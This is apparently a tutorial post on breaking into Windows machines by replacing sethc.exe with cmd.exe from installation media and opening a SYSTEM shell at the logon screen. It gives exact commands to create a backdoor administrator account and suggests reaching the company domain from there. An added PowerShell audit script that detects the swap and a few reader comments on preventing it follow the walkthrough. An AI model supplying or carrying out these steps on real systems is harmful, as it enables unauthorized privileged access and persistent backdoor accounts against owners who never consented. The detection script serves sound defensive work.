Acquiring Administrative Access to Windows
I will show you one of Windows’ weaknesses that can be used to break into a system. I’ll show you how to get access to the local computer, and from there the company’s domain, by giving yourself elevated admin rights on the machine you are logged into, allowing you to do whatever you want as admin.
Step 1: Insert a Windows 7, Windows 8 or Windows 10 DVD and restart the machine. The machine should boot from the DVD:
Step 2: You will see “Press any key to boot from CD or DVD…”; hit a key to start the DVD.
Step 3: Wait until you reach the setup screen:
Step 4: Press Shift + F10 to get a command prompt.
Step 5: Locate the drive where the Windows folder is located. Normally it is the D drive, so run ‘d:’ to change to the D drive:
Step 6: Type in “cd windows\system32”.
Step 7: Type in “copy sethc.exe ..” to keep a backup copy of the original sethc.exe.
Step 8: Run “copy cmd.exe sethc.exe”.
Step 9: Run the “exit” command and reboot the machine:
Step 10: Once you are at the logon screen, press the “Shift” key 5 times.
Step 11: Type in “whoami” and you will see you are logged on as NT AUTHORITY\SYSTEM – from here you can do whatever you want. Here are some commands that you can run:
- net user
- net user LETMEIN P@55w0rd /add
- net localgroup administrators LETMEIN /add
Step 12: If you want to add a domain user account to the Administrators group, type in “compmgmt.msc”.
Step 13: Click on “Local Users and Groups”.
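Defensive check, added here and not part of the original post: this PowerShell script audits whether the swap from Steps 7–10 is in place. It assumes it is run elevated on the machine being audited (the $System32 parameter defaults to the live System32 folder) and flags sethc.exe or any other logon-screen accessibility helper whose contents match cmd.exe, whose version resource names a different binary, or which has an Image File Execution Options debugger set.

```powershell
# Added example, not from the original post. Assumes an elevated PowerShell on the
# host being audited; pass -System32 to point at a mounted offline system volume
# (the registry check only applies to the live machine).
param(
    [string]$System32 = "$env:SystemRoot\System32"
)

# Accessibility helpers that winlogon launches as SYSTEM from the logon screen.
$AccessibilityBinaries = @(
    'sethc.exe', 'utilman.exe', 'osk.exe', 'narrator.exe',
    'magnify.exe', 'displayswitch.exe', 'atbroker.exe'
)

$cmdHash  = (Get-FileHash -Path (Join-Path $System32 'cmd.exe') -Algorithm SHA256).Hash
$findings = @()

foreach ($name in $AccessibilityBinaries) {
    $path = Join-Path $System32 $name
    if (-not (Test-Path $path)) { continue }

    # Check 1: file content identical to cmd.exe (the copy made in Step 8 above).
    $hash = (Get-FileHash -Path $path -Algorithm SHA256).Hash
    if ($hash -eq $cmdHash) {
        $findings += "$name has the same SHA256 as cmd.exe (binary replaced)"
    }

    # Check 2: the PE version resource should still name the expected binary.
    # cmd.exe is signed, so a signature check alone would not catch the swap;
    # a copied cmd.exe keeps OriginalFilename = Cmd.Exe.
    $base = [IO.Path]::GetFileNameWithoutExtension($name)
    $orig = (Get-Item $path).VersionInfo.OriginalFilename
    if ($orig -and $orig -notlike "$base*") {
        $findings += "$name reports OriginalFilename '$orig' (expected $name)"
    }

    # Check 3: an IFEO Debugger value runs an arbitrary program in place of the helper.
    $ifeo = "HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\$name"
    $dbg  = (Get-ItemProperty -Path $ifeo -Name Debugger -ErrorAction SilentlyContinue).Debugger
    if ($dbg) { $findings += "$name has an IFEO Debugger set to '$dbg'" }
}

if ($findings) {
    $findings | ForEach-Object { Write-Warning $_ }
    exit 1
}
Write-Host "No accessibility-binary tampering detected in $System32"
```

Run it as a scheduled task or from your endpoint management tooling; a non-zero exit code means at least one helper was tampered with and the backup copy from Step 7 (or a clean copy from installation media) should be restored.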
great video.
thanks for the lesson.
nice. so to prevent this one should disable user’s ability to boot from CD/DVD/USB.
correct. you can disable the CD/DVD/USB access. some companies do this because of sensitive data being held on their servers.